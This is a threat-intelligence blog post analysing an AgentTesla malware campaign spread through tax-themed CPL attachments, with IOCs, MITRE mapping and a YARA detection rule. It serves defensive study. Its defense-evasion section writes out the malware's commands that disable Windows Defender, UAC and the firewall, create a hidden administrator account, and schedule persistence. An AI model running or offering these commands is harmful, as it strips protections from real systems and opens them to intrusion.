Key Takeaways
- The blog highlights a new infection chain for distributing AgenTesla RAT. It involves a spam email with a CPL file that, when executed, downloads a PowerShell script that injects AgentTesla malware in exe and MSbuild.exe.
- The PowerShell scripts use obfuscated binary strings to hide malicious code.
- For persistence, malicious VB Scripts are dropped at startup folders, and a new schedule task is created.
- A .NET-based loader file is used to inject AgentTesla payload in the memory.
Executive Summary
Cyble Research and Intelligence Labs (CRIL) has recently observed an AgentTesla malware attack that employs a well-developed process with multiple stages. The campaign is designed to trick unsuspecting users into opening Tax related documents and accompanying control panel files (CPL).
The adversary leverages malicious CPL files to execute malicious PowerShell scripts and utilizes a custom obfuscated .NET loader to inject AgentTesla payload.
During the investigation, we discovered a malicious email with the subject Gorgees Ghada shared “Gorgees_Ghada_Tax_2021-2022.zip” with you. This email contains an attached archive file, which includes two files, one PDF and another CPL file, namely Gorgees_Ghada_Tax 2021.pdf and Gorgees_Ghada_Tax 2021.cpl.
This CPL file executes a PowerShell script to download another file from the URL hxxp://cawp1[.]blogspot[.]com/atom.xml. This newly downloaded file contains a .NET loader injecting AgentTesla remote access trojan (RAT) into system processes.
The figure below shows the spam email.
AgentTesla is a .NET-based information stealer that infiltrates computers and exfiltrates sensitive information. The main focus of the AgentTesla is credentials and personal information of victims. Additionally, Agent Tesla has capabilities such as keylogging, stealing clipboard data, file system access, and data exfiltration to the Command and Control (C&C) server.
Technical Details
The attack lifecycle comprises several distinct stages, each serving a specific purpose to achieve its goals. These stages encompass various techniques and methodologies to facilitate initial infection, establish persistence on the targeted system, evade detection by security measures, and employ process injection for further advancements.
The figure below shows the AgentTesla infection chain.
Initial Infection
The email attachment encompasses a malicious file named Gorgees_Ghada_Tax 2021.cpl. It is a CPL file. The SHA256 hash of this file is 72219e131476a429db3323631405429880f29bb3bbe655d31f1b3e37edd18303.
During our analysis, merely three security vendors successfully detected this malicious file, as shown in the figure below.
The Gorgees_Ghada_Tax 2021.cpl file operates similarly to regular executables, requiring only a double-click to initiate its execution. Within this file lies PowerShell code, responsible for fetching a malicious PowerShell script from a hardcoded URL cawp1[.]blogspot[.]com/atom.xml and subsequently executing it through the use of powershell.exe.
The figure below shows the code for downloading and executing the script.
The Downloaded powershell script contains several obfuscated binary strings. Various binary substrings are replaced with special characters like ‘*’ and ‘_’ for obfuscation. Once the script is executed, PowerShell undertakes a deobfuscation process, replacing the special characters with their original binary substrings, thereby revealing the actual content of the binary strings. Subsequently, these deobfuscated binary strings are transformed into additional PowerShell scripts, an executable, and a DLL file.
The figure below shows the downloaded malicious script.
After being executed, the malicious PowerShell script drops three scripts into the C:ProgramDataphuddiupdate directory: AdobeUpdates.vbs, Clang.vbs, and Se**logy.!!!!!!!!!!!!!!!!. These scripts facilitate a series of malicious actions, which are elaborated on in the subsequent sections.
The figure below shows the files dropped by the malicious PowerShell script.
Payload Injection
Within the script “Se**logy.!!!!!!!!!!!!!!!!”, two binary string variables, namely “BigBOSS” and “s**ybunbun”, are concealed through obfuscation. The variable BigBOSS corresponds to an obfuscated AgentTesla executable, while the variable “s**ybunbun” conceals yet another obfuscated PowerShell script.
The figure below shows contents of “Se**logy.!!!!!!!!!!!!!!!!” file.
Subsequently, the PowerShell script undertakes a deobfuscation process on the string variable “s**ybunbun” and executes the underlying PowerShell script. This deobfuscated script includes a loader DLL file based on .NET, which is once again concealed in binary string format. The script performs deobfuscation on the binary string, subsequently converting it into a byte array to get the actual loader.
The figure below shows the script code to create Byte Array from Binary String.
Upon generating the .NET loader binary, the script initializes a designated method, C, within namespace A and Class B of the .NET loader.
The figure below shows the method C of the .NET Loader DLL file.
This DLL then engages in the process injection, which injects the AgentTesla executable into three distinct executables located at C:WindowsMicrosoft.NETFramework: v4.0.30319RegSvcs.exe, v2.0.50727RegSvcs.exe, and v3.5Msbuild.exe.
This process injection is accomplished by utilizing the Invoke method within the script, as shown below.
The ultimate injected payload is a 32-bit variant of the AgentTesla malware, with a SHA256 hash of 54ccee6fa601b22fc17e00f7bf48c9d33f103ea1d3ba6cc86986bfe19a624b4e.
Persistence
The malware employs both scheduled tasks and the Startup folder in its attempts to establish persistence. Within the downloaded PowerShell script, the command “schtasks /create /sc MINUTE /mo 200 /tn EWxdwwATE /F /tr “$KILKGGKGK C:ProgramDataphuddiupdateAdobeUpdates.vbs” is present. This command generates a scheduled task entry within the Task Scheduler. This entry outlines that the script AdobeUpdates.vbs located at C:ProgramDataphuddiupdate will be executed on a daily basis without a specific end date.
The figure below shows the task scheduler entry.
Furthermore, to enhance its persistence, the PowerShell script drops two scripts, AdobeUpdates.vbs, and Clang.vbs, into the system’s startup folder. The startup folder is scanned upon starting the operating system, and any files within it are executed as part of the initialization process.
The figure below shows the start-up folder.
Both scripts, AdobeUpdates.vbs and Clang.vbs, share a common code, differing solely in their respective download URLs. Encapsulated within these scripts is a PowerShell command intended for execution. The VBScripts contain powershell command to download the malicious payload from the hardcoded URL every time the system starts or at the time mentioned in the Scheduled task entry.
The figure below shows the complete code of the AdobeUpdates.vbs.
Defense Evasion
In order to evade detection mechanisms, the initial PowerShell script utilizes an encoded binary string variable named AMSISSISISI. Within this variable, two binary strings are embedded, accompanied by code that stops the Windows Defender services and bypasses the Antimalware Scan Interface (AMSI).
The figure below shows the deobfuscated string AMSISSISISI.
The variable AMI is an AMSI bypass script that tries to disable AMSI’s “amsiInitFailed” check by manipulating non-public, static fields in the “System.Management.Automation.AmsiUtils” class.
The Figure below shows the powershell command to bypass AMSI.
Another variable, DEF, is a PowerShell script to manipulate windows defender settings. The script contains the exclusion of extensions, paths, processes, IPAddress, and other Windows Defender settings.
Excluded Extensions: .bat, .ppam, .xls, .docx, .bat, .exe, .vbs, .js.
Excluded Path: C:, D: and E:.
Excluded Processes: explorer.exe, kernel32.dll, aspnet_compiler.exe, cvtres.exe, CasPol.exe, csc.exe, Msbuild.exe, ilasm.exe, InstallUtil.exe, jsc.exe, Calc.exe, powershell.exe, rundll32.exe, conhost.exe, Cscript.exe, mshta.exe, cmd.exe, DefenderisasuckingAntivirus and wscript.exe.
The script modifies the following windows defender settings to impair defense:
- Add-MpPreference -ExclusionIpAddress 127.0.0.1
- Add-MpPreference -ThreatIDDefaultAction_Actions 6
- Add-MpPreference -AttackSurfaceReductionRules_Ids 0
- Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
- Set-MpPreference -EnableControlledFolderAccess Disabled
- Set-MpPreference -PUAProtection disable
- Set-MpPreference -HighThreatDefaultAction 6 -Force
- Set-MpPreference -ModerateThreatDefaultAction 6
- Set-MpPreference -LowThreatDefaultAction 6
- Set-MpPreference -SevereThreatDefaultAction 6
- Set-MpPreference -ScanScheduleDay 8
Additionally, the script executes the following commands.
Command | Description |
New-Ipublicroperty -Path HKLM:SoftwareMicrosoftWindowsCurrentVersionpoliciessystem -Name EnableLUA -PropertyType DWord -Value 0 -Force | PowerShell command to disable User Account Control (UAC) on the system. |
Stop-Service -Name WinDefend -Confirm:$false -Force | PowerShell command forcefully stops the Windows Defender service without asking for confirmation and without waiting for dependent services or tasks to finish |
Set-Service -Name WinDefend -StartupType Disabled | Command prevents the WinDefend service from automatically starting when the system starts up. |
net user System32 /add | Command to create a new user account with the username “System32” |
net user System32 123 | Set the password for the user account with the username “System32” to “123” |
net localgroup administrators System32 /add | Add “System32” to the “Administrators” local group on the system. |
net localgroup “Remote Desktop Users” System32 /add | Add the account “System32” to the “Remote Desktop Users” local group on the system. |
net stop WdNisSvc | Stop Windows Defender Network Inspection Service WdNisSvc service |
sc delete windefend | Permanently delete the “windefend” service |
netsh advfirewall set allprofiles state off | Turn off the Windows Firewall for all network profiles on the system |
The figure below shows the script to impair defense.
The figure below shows the process tree of the AgentTesla Infection.
Conclusion
The observed malware campaign demonstrates a sophisticated and multi-stage attack strategy. By disguising malicious content as a seemingly legitimate program, the adversaries aim to lure unsuspecting users into activating weaponized control panel files that execute PowerShell scripts and load the dangerous AgentTesla malware. The successful infiltration of AgentTesla allows attackers to conduct data theft and execute commands on compromised systems, posing significant security risks. Vigilance and robust security measures are imperative to combat this threat.
Our Recommendations
- Implement strong email filtering solutions to detect and block spam emails, phishing attempts, and malicious attachments.
- Refrain from opening untrusted links and email attachments without verifying their authenticity.
- Use a reputed antivirus and Internet security software package on your connected devices, including PC, laptop, and mobile.
- Refrain from opening untrusted links and email attachments without verifying their authenticity.
MITRE ATT&CK® Techniques
Tactic | Technique ID | Technique Name |
Initial Access | T1566 | Phishing |
Execution | T1059
T1204 |
Command and Scripting Interpreter
User Execution |
Persistence | T1547.001
T1053.005 |
Startup Folder
Scheduled Task/Job: Scheduled Task |
Defense Evasion | T1140
T1562.001 T1562.004 T1562.006 T1562.007 |
Deobfuscate/Decode Files or Information
Impair Defenses: Disable or Modify Tools Impair Defenses: Disable or Modify System Firewall Impair Defenses: Indicator Blocking Impair Defenses: Disable or Modify Cloud Firewall |
Command and Control | T1071 | Application Layer Protocol |
Indicators of Compromise (IOCs)
Indicators | Indicator Type | Details |
2220fb8ec2e0055ed544f3eccb953fdd
5ea9c0fbe63b1e6755504f932d6f53e1bb0aa280 72219e131476a429db3323631405429880f29bb3bbe655d31f1b3e37edd18303 |
MD5
SHA1 SHA256 |
Gorgees_Ghada_Tax 2022.cpl |
cawp1[.]blogspot[.]com/atom.xml | URL | PowerShell script |
b38639c1ca724c0f13496b3eb89e24a8
c898d455b9b0e34f530b6fa10bcb368eeaed29b2 e6d9f4326a2423f6a70d69ff50e3158d7684b166ecdc58f3b0c534318c4b9e36 |
MD5
SHA1 SHA256 |
AdobeUpdates.vbs |
2dcdda94429cdbe8d1f0c4e4a9f04e36
d874a11d00aa240f837efd742deb028de79eaad0 a4e6a885d3c0f0b62a3b322e3210c63977f2a5a3d0cea5e0f5be51b3d73d4054 |
MD5
SHA1 SHA256 |
Clang.vbs |
dc580fd8c70ed8d35c129cf4b45c7dc2
4fded1fc42e6cd755c9829b91825d6a2ce1a364c 3f778a91bd64a8130d52f3ecee3806838688a171b6bde05372a238a6e4aba2cd |
MD5
SHA1 SHA256 |
Sexology.~!!!!!!!!!!!!!!!!~ |
8f9de3ce238e237cc649d2db9fe890af
b3fb0379b4e2679c0c1fa350b7962c2f54dd068b 54ccee6fa601b22fc17e00f7bf48c9d33f103ea1d3ba6cc86986bfe19a624b4e |
MD5
SHA1 SHA256 |
AgentTesla |
4729b73425c811e8b9c4142504c7500d
4617ddabccc0aeb4ce669b370de3079410657fe0 38b41ad398e4807cb6153eebc0bfff248799ac94d842766d47c37d8a288b720e |
MD5
SHA1 SHA256 |
.NET loader |
Yara Rules
rule AgentTesla_CPL_Downloader
{
meta:
author = “Cyble”
description = “Detects AgentTesla CPL Downloader Files”
date = “2023-08-08”
os = “Windows”
threat_name = “AgentTesla”
severity = 100
reference_sample = “72219e131476a429db3323631405429880f29bb3bbe655d31f1b3e37edd18303”
strings:
$a = “blogspot.com/atom.xml’”
$b = “-ExecutionPolicy Bypass -c ”%s””
$c = “(‘{1}{0}’-f’calc’,’i’).replace(‘calc’,’eX’)”
condition:
all of them
}
Detection Guidance:
Due to its association with downloading harmful PowerShell code from the “blogspot.com/atom.xml” URL pattern, it is recommended to implement a security rule that halts the execution of the PowerShell.exe application in cases where the strings “blogspot.com/atom.xml’” and “.replace(‘calc’,’eX’)” are present in PowerShell command line. This restriction should be enforced exclusively when the origin of the PowerShell.exe process is traced back to rundll32.exe, with the rundll32.exe process initiated by control.exe
Disclaimer: The provided detection guidance rules are purely illustrative and should not be directly implemented in a production environment without proper testing, validation, and consideration of potential impacts on system performance and security. Always exercise caution when implementing security rules or policies, and ensure you fully understand the consequences of any changes made to your system or network.
Related
Source: https://cyble.com/blog/agenttesla-malware-targets-users-with-malicious-control-panel-file/